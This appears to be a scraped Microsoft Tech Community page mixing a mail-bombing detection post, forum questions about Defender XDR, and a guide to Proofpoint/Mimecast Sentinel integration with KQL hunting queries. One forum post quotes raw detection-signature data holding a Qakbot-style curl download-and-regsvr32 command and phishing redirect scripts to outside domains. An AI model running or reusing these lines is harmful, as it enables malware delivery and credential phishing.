Junk folder (of Outlook). Note: Safe sender lists in Outlook continue to be honored, so emails from trustworthy sources are not unexpectedly moved to the Junk folder (in order to prevent false positives). Since the initial rollout that started in early May, we’ve seen a tremendous impact in blocking mail bombing attacks out of our customers’ inboxes: How to leverage new “Mail bombing” detection technology in SOC experiences 1. Investigation and hunting: SOC analysts can now view the new Detection technology as Mail bombing within the following surfaces: Threat Explorer, Email entity page and Advanced Hunting empowering them to investigate, filter and hunt for threats related to mail bombing. 2. Custom detection rule: To analyze the frequency and volume of attacks from mail bombing vector, or to have automated alerts configured to notify SOC user whenever there is a mail bombing attack, SOC analysts can utilize the custom detection rules in Advanced hunting by writing a KQL query using data in DetectionMethods column of EmailEvents table. Here’s a sample query to get you started: EmailEvents | where Timestamp > ago(1d) | where DetectionMethods contains "Mail bombing" | project Timestamp, NetworkMessageId, SenderFromAddress, Subject, ReportId The SOC experiences are rolled out worldwide to all customers. Conclusion Email bombs represent an incidental threat in the world of cybersecurity. With the new detection technology for Mail Bombing, Microsoft Defender for Office 365 protects users from these attacks and empowers Security Operations Center Analysts to ensure to gain visibility into such attacks and take quick actions to keep organizations safe! Note: The Mail bombing protection is available by default in Exchange Online Protection and Microsoft Defender for Office 365 plans. This blog post is associated with Message Center post MC1096885. Also read Part 2 of our blog series to learn more about protection against multi-modal attacks involving mail bombing and correlation of Microsoft Teams activity in Defender. Watch this video to learn more: Microsoft Defender for Office 365 | Mail Bombing and Mixed-Mode Attack Protection Learn: Detection technology details table What's on the Email entity page Filterable properties in the All email view in Threat ExplorerQuestion malware autodelete
A malware like Trojan:Win32/Wacatac.C!ml can download other malware, this other malware can perform the malicious action, this malware can delete itself and in the next scan of antivirus free this malware that deleted itself will not have any trace and will not be detected by the scan?117Views0likes2CommentsNetworkSignatureInspected
Hi, Whilst looking into something, I was thrown off by a line in a device timeline export, with ActionType of NetworkSignatureInspected, and the content. I've read this article, so understand the basics of the function: Enrich your advanced hunting experience using network layer signals from Zeek I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices. Can anyone provide any clarity on the contents of AdditionalFields, where the ActionType is NetworkSignatureInspected, references for example CVE-2021-44228: ${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&®svr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https:// Defender reports no issues on the device and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced. Any assistance with rationalising this would be great, thanks.215Views0likes2CommentsSecurity Admin role replacement with Defender XDR
We currently have the Security Administrator role assigned to multiple users in our organization. We are considering replacing it with custom RBAC roles in Microsoft Defender XDR as described in https://learn.microsoft.com/en-us/defender-xdr/custom-roles Our goal is to provide these users full access to the Microsoft Defender security portal so they can respond to alerts and manage security operations. They do not require access to the Entra ID portal for tasks such as managing conditional access policies or authentication method policies. Can we completely remove the Security Administrator role and rely solely on the custom RBAC role in Defender XDR to meet these requirements?213Views0likes2CommentsWhere can I get the latest info on Advanced Hunting Table Retirement
First question - where can I find the latest info on the deprecation of advanced hunting tables? Background - I was developing some detections and as I was trying to decide on which table I should use I opened up the docs containing the schema for the `EntraIdSignInEvents` table (https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-entraidsigninevents-table) and was met by two ambiguous banners stating: "On December 9, 2025, the EntraIdSignInEvents table will replace AADSignInEventsBeta. This change will be made to remove the latter's preview status and to align it with the existing product branding. Both tables will coexist until AADSignInEventsBeta is deprecated after the said date. To ensure a smooth transition, make sure that you update your queries that use the AADSignInEventsBeta table to use EntraIdSignInEvents before the previously mentioned date. Your custom detections will be updated automatically and won't require any changes." "Some information relates to prereleased product that may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here. Customers need to have a Microsoft Entra ID P2 license to collect and view activities for this table." This made me very confused as I still have data from AADSignInEventsBeta on my tenant from today. I'm not sure what this means and I'm hoping to get some clear info on table retirement.137Views0likes2CommentsIntegrating Proofpoint and Mimecast Email Security with Microsoft Sentinel
Microsoft Sentinel can ingest rich email security telemetry from Proofpoint and Mimecast to power advanced phishing detection. The Proofpoint On Demand (POD) Email Security and Proofpoint Targeted Attack Protection (TAP) connectors pull threat logs (quarantines, spam, phishing attempts) and user click data into Sentinel. Similarly, the Mimecast Secure Email Gateway connector ingests detailed mail flow and targeted-threat logs (attachment/URL scans, impersonation events). These integrations use Azure-hosted ingestion (via Logic Apps or Azure Functions) and the new Codeless Connector framework to call vendor APIs on a schedule. The result is a consolidated dataset in Sentinel’s Log Analytics, enabling correlated alerting and hunting across email, identity, and endpoint signals. Figure: Phishing emails are processed by Mimecast’s gateway and Proofpoint POD/TAP services. Security logs (delivery/quarantine events, malicious attachments/links, user clicks) flow into Microsoft Sentinel. In Sentinel, these mail signals are correlated with identity (Azure AD), endpoint (Defender) and network telemetry for end-to-end phishing detection. Proofpoint POD (Email Protection) Connector The Proofpoint POD connector ingests core email protection logs. It creates two tables, ProofpointPODMailLog_CL and ProofpointPODMessage_CL. These logs include per-message metadata (senders, recipients, subject, message size, timestamps), threat scores (spamScore, phishScore, malwareScore, impostorScore), and attachment details (number of attachments, names, hash values and sandbox verdicts). Quarantine actions are recorded (quarantine folder/rule) and malicious indicators (URL or file hash) and campaign IDs are tagged in the threatsInfoMap field. For example, each ProofpointPODMessage_CL record may carry a sender_s (sender email domain hashed), recipient list, subject, and any detected threat type (Phish/Malware/Spam/Impostor) with associated threat hash or URL. Deployment: Proofpoint POD uses Sentinel’s codeless connector (an Azure Function behind the scenes). You must provide Proofpoint API credentials (Cluster ID and API token) in the connector UI. The connector periodically calls the Proofpoint SIEM API to fetch new log events (typically in 1–2 hour batches). The data lands in the above tables. (Older custom logic-app approaches similarly parse JSON output from the /v2/siem/messages endpoints.) Proofpoint TAP (Targeted Attack Protection) Connector Proofpoint TAP provides user-click and message-delivery events. Its connector creates four tables: ProofPointTAPMessagesDeliveredV2_CL, ProofPointTAPMessagesBlockedV2_CL, ProofPointTAPClicksPermittedV2_CL, and ProofPointTAPClicksBlockedV2_CL. The message tables report emails with detected threats (URL or attachment defense) that were delivered or blocked by TAP. They include the same fields as POD (message GUID, sender, recipients, subject, threat campaign ID, scores, attachments info). The click tables log when users click on URLs: each record has the URL, click timestamp (clickTime), the user’s IP (clickIP), user-agent, the message GUID, and the threat ID/category. These fields allow you to see who clicked which malicious link and when. As the connector description notes, these logs give “visibility into Message and Click events in Microsoft Sentinel” for hunting. Deployment: The TAP connector also uses the codeless framework. You supply a TAP API service principal and secret (proofpoint SIEM API credentials) in the Sentinel content connector. The function app calls TAP’s /v2/siem/clicks/blocked, /permitted, /messages/blocked, and /delivered endpoints. The Proofpoint SIEM API limits queries to 1-hour windows and 7-day history, with no paging (all events in the interval are returned). (A Logic App approach could also be used, as shown in the Tech Community blog: one HTTP GET per event type and a JSON Parse before sending to Log Analytics.) Mimecast Secure Email Gateway Connector The Mimecast connector ingests the Secure Email Gateway (SEG) logs and targeted-threat (TTP) logs. Inbound, outbound and internal mail events from the Mimecast MTA (receipt, processing, delivery stages) are pulled via the API. Typical fields include the unique message ID (aCode), sender, recipient, subject, attachment count/names, and the policy actions or holds (e.g. spam quarantine). For example, the Mimecast “Process” log shows AttCnt, AttNames, and if the message was held (Hld) for review. Delivery logs include the success/failure and TLS details. In addition, Mimecast TTP logs are collected: URL Protect logs (when a user clicks a blocked URL) include the clicked URL (url), category (urlCategory), sender/recipient, and block reason. Impersonation Protect logs capture spoofing detections (e.g. if an internal name is impersonated), with fields like Sender, Recipient, Definition and Action (hold/quarantine). Attachment Protect logs record malicious file detections (filename, hash, threat type). Deployment: Like Proofpoint, Mimecast’s connector uses Azure Functions via the Sentinel content hub. You install the Mimecast solution, open the connector page, then enter Azure app credentials and Mimecast API keys (API Application ID/Key and Access/Secret for the service account). As shown in the deployment guide, you must provide the Azure Subscription, Resource Group, Log Analytics Workspace and the Azure Client (App) ID, Tenant ID and Object ID of the admin performing the setup. On the Mimecast side, you supply the API Base URL (regional), App ID/Secret and user Access/Secret. The connector creates a Function App that polls Mimecast’s SIEM APIs on a cron schedule (default every 30 minutes). You can optionally specify a start date for backfilling up to 7 days of logs. The default tables are MimecastSIEM_CL (for email flow logs) and MimecastDLP_CL (for DLP/TTP events), though custom names can be set. Ingestion Considerations Data Latency: All these connectors are pull-based and typically run on a schedule (often 30–60 minutes). For example, the Proofpoint POD docs note hourly log increments, and Mimecast logs are aggregated every 30 minutes. Expect a delay of up to an hour or more from event occurrence to Sentinel ingestion. Schema Nuances: The APIs often return nested arrays and optional fields. For instance, the Proofpoint blog warns that some JSON fields can be null or vary in type, so the parse schema should account for all possibilities. Similarly, Mimecast logs come in pipe-delimited or JSON format, with values sometimes empty (e.g. no attachments). In KQL, use tostring() or parse_json() on the raw _CL columns, and mv-expand on any multivalue fields (like message parts or threat lists). Table Names: Use the connector’s tables as listed. For Proofpoint: ProofpointPODMailLog_CL and ProofpointPODMessage_CL; for TAP: ProofPointTAPMessagesDeliveredV2_CL, ProofPointTAPMessagesBlockedV2_CL, ProofPointTAPClicksPermittedV2_CL, ProofPointTAPClicksBlockedV2_CL. For Mimecast SEG/TTP: MimecastSIEM_CL (seg logs) and MimecastDLP_CL (TTP logs). API Behavior: The Proofpoint TAP API has no paging. Be aware of timezones (Proofpoint uses UTC) and use the Sentinal ingestion TimeGenerated or event timestamp fields for binning. Detection Engineering and Correlation To detect phishing effectively, we correlate these email logs with identity, endpoint and intel data: Identity (Azure AD): Mail logs contain recipient addresses and (hashed) sender user parts. A common tactic is to correlate SMTP recipients or sender domains with Azure AD user records. For example, join TAP clicks by recipient to the user’s UPN. The Proofpoint logs also include the clicker’s IP (clickIP); we can match that to Azure AD sign-in logs or VPN logs to find which device/location clicked a malicious link. Likewise, anomalous Azure AD sign-ins (impossible travel, MFA failure) after a suspicious email can strengthen the case. Endpoints (Defender): Once a user clicks a bad link or opens a malicious attachment (captured in TAP or Mimecast logs), watch for follow-on behaviors. For instance, use Sentinel’s DeviceSecurityEvents or DeviceProcessEvents to see if that user’s machine launched unusual processes. The threatID or URL hash from email events can be looked up in Defender’s file data. Correlate by username (if available) or IP: if the email log shows a link click from IP X, see if any endpoint alerts or logon events occurred from X around the same time. As the Mimecast integration touts, this enables “correlation across Mimecast events, cloud, endpoint, and network data”. Threat Intelligence: Use Sentinel’s ThreatIntelligenceIndicator tables or Microsoft’s TI feeds to tag known bad URLs/domains in the email logs. For example, join ProofPointTAPClicksBlockedV2_CL on the clicked url against ThreatIntelligenceIndicator (type=URL) to automatically flag hits. Proofpoint’s logs already classify threats (malware/phish) and provide a threatID; one can enrich that with external intel (e.g. check if the hash appears in TI feeds). Mimecast’s URL logs include a urlCategory field, which can be mapped to known malicious categories. Automated playbooks can also pull Intel: e.g. use Sentinel’s TI REST API or Azure Sentinel watchlists containing phishing domains to annotate events. In summary, a robust detection strategy might look like: (1) Identify malicious email events (high phish scores, quarantines, URL clicks). (2) Correlate these events by user with Azure AD logs (did the user log in from a new IP after a phish click?). (3) Correlate with endpoint alerts (Defender found malware on that device). (4) Augment with threat intelligence lookups on URLs and attachments from the email logs. By linking the Proofpoint/Mimecast signals to identity and endpoint events, one can detect the full attack chain from email compromise to endpoint breach. KQL Query Here are representative Kusto queries for common phishing scenarios (adapt table/field names as needed): Malicious URL Click Detection: Identify users who clicked known-malicious URLs. For example, join TAP click logs to TI indicators:This flags any permitted click where the URL matches a known threat indicator. Alternatively, aggregate by domain: let TI = ThreatIntelligenceIndicator | where Active == true and _EntityType == "URL"; ProofPointTAPClicksPermittedV2_CL | where url_s != "" | project ClickTime=TimeGenerated, Recipient=recipient_s, URL=url_s, SenderIP=senderIP_s | join kind=inner TI on $left.URL == TI._Value | project ClickTime, Recipient, URL, Description=TI.Description This flags any permitted click where the URL matches a known threat indicator. Alternatively, aggregate by domain: ProofPointTAPClicksPermittedV2_CL | extend clickedDomain = extract(@"https?://([^/]+)", 1, url_s) | summarize ClickCount=count() by clickedDomain | where clickedDomain has "maliciousdomain.com" or clickedDomain has "phish.example.com" Quarantine Spike (Burst) Detection: Detect sudden spikes in quarantined messages. For example, using POD mail log:This finds hours with an unusually high number of held (quarantined) emails, which may indicate a phishing campaign. You could similarly use ProofPointTAPMessagesBlockedV2_CL. ProofpointPODMailLog_CL | where action_s == "Held" | summarize HeldCount=count() by bin(TimeGenerated, 1h) | order by TimeGenerated desc | where HeldCount > 100 Targeted User Phishing: Find if a specific user received multiple malicious emails. E.g., for user email address removed for privacy reasons:This lists recent phish attempts targeting Username. You might also join with TAP click logs to see if she clicked anything. ProofpointPODMessage_CL | where recipient has "email address removed for privacy reasons" | where array_length(threatsInfoMap) > 0 and threatsInfoMap_classification_s == "Phish" | project TimeGenerated, sender_s, subject_s, threat=threatsInfoMap_threat_s Campaign-Level Analysis: Group emails by Proofpoint campaign ID to see scope of each campaign:This shows each campaign ID with how many unique recipients were hit and one example subject. Combining TAP and POD tables on GUID_s or QID_s can further link click events back to the originating message/campaign. ProofpointPODMessage_CL | mv-expand threatsInfoMap | summarize Recipients=make_set(recipient), Count=dcount(recipient) by CampaignID=threatsInfoMap_campaignId_s | project CampaignID, RecipientCount=Count, Recipients, SampleSubject=any(subject_s) Each query can be refined (for instance, filtering only within a recent time window) and embedded in Sentinel Analytics rules or hunting. The key is using the connectors’ fields – URLs, sender/recipient addresses, campaign IDs – to pivot between email data and other security signals.538Views4likes0Comments